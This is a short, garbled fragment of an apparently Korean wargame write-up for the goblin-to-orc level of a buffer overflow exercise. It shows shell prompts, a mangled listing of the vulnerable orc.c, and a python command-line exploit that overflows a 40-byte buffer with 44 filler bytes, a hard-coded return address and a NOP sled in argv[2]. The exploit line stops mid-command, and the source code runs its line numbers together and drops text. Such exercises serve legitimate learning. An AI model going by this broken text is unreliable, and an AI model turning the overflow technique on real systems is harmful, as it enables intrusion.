[4] goblin -> orc ( argv[2] 활용 )
goblin / hackers proof[goblin@localhost goblin]$ /bin/bash2[goblin@localhost goblin]$ export SHELL=/bin/bash2 [ orc.c ]123456789101112131415161718192021222324252627282930 #include #include extern char **environ; main(int argc, char *argv[]){ char buffer[40]; int i; if(argc 보정작업[goblin@localhost goblin]$ ./orc $(python -c 'print "A" * 44 + "\x3c\xf9\xff\xbf"') $(python -c 'print "\x90" * 1000 + "..
2017.11.17